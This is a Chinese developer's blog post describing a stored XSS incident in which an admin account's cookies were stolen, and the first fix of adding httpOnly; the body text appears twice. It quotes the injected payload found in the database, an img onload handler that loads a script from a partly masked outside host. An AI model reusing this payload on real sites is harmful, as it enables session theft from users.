xss-javascript被攻击系列--(一)
2017-12-18 12:46
267 查看
终于可以挤个空档,写写这些日子的惨痛经历。
某天产品A突然喊到,admin账号被盗了,导致金钱丢失了。瞬间头皮发麻,完蛋了。
赶紧排查可能出现漏洞的地方,在数据库中找到了攻击数据如下:
项目中有富文本编辑器,编辑器在提交时已经将脚本关键字过滤掉了。
god! 攻击者直接攻击接口,将恶意数据插入到了库里,在展示此页面的数据时必定会加载以及执行代码中的相关脚本。
分析下js脚本中的内容是直接窃取用户登录cookies的。
去看项目相关cookies,没有设置httpOnly,这样用户登录信息对所有站点脚本就是完全公开的,攻击者拿到cookies轻而易举。攻击内容中添加有吸引力的内容,用户去访问有问题网页的概率会大大增加,用户丢失信息是必然。
服务器端补上了httpOnly属性,这个洞算是堵上了。
可脚本还是会执行这个问题得解决呀,怎么办呢?下一篇继续
有什么好的建议,多多交流哟。
某天产品A突然喊到,admin账号被盗了,导致金钱丢失了。瞬间头皮发麻,完蛋了。
赶紧排查可能出现漏洞的地方,在数据库中找到了攻击数据如下:
[img srC=\"/project//emotion/images/tsj/t_0004.gif\" onload=\"jQuery.getScript('https://x.****.com/kuF4')\"/]
项目中有富文本编辑器,编辑器在提交时已经将脚本关键字过滤掉了。
god! 攻击者直接攻击接口,将恶意数据插入到了库里,在展示此页面的数据时必定会加载以及执行代码中的相关脚本。
分析下js脚本中的内容是直接窃取用户登录cookies的。
去看项目相关cookies,没有设置httpOnly,这样用户登录信息对所有站点脚本就是完全公开的,攻击者拿到cookies轻而易举。攻击内容中添加有吸引力的内容,用户去访问有问题网页的概率会大大增加,用户丢失信息是必然。
服务器端补上了httpOnly属性,这个洞算是堵上了。
可脚本还是会执行这个问题得解决呀,怎么办呢?下一篇继续
有什么好的建议,多多交流哟。
相关文章推荐
- xss-javascript被攻击系列--(二)
- Web安全系列(三):XSS 攻击进阶(挖掘漏洞)
- Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
- web安全系列(一):XSS 攻击基础及原理
- 演示XSS漏洞攻击 | 发帖如何提交javascript代码
- 深入理解JavaScript系列(3):全面解析Module模式
- 深入理解JavaScript系列(34):设计模式之命令模式
- 深入理解JavaScript系列(9):根本没有“JSON对象”这回事!
- 深入理解JavaScript系列(23):JavaScript与DOM(上)——也适用于新手
- 浅谈 JavaScript DDoS 攻击原理与防御
- 深入理解JavaScript系列(6):S.O.L.I.D五大原则之单一职责SRP
- 深入理解JavaScript系列(37):设计模式之享元模式
- 深入理解JavaScript系列(28):设计模式之工厂模式详解
- 深入理解JavaScript系列(25):设计模式之单例模式详解
- 深入理解JavaScript系列(18):面向对象编程之ECMAScript实现(推荐)
- 深入理解JavaScript系列(3):全面解析Module模式
- 一步一步学Silverlight 2系列(21):如何在Silverlight中调用JavaScript
- 深入理解JavaScript系列(25):设计模式之单例模式
- 深入理解JavaScript系列(32):设计模式之观察者模式
- 深入理解JavaScript系列(33):设计模式之策略模式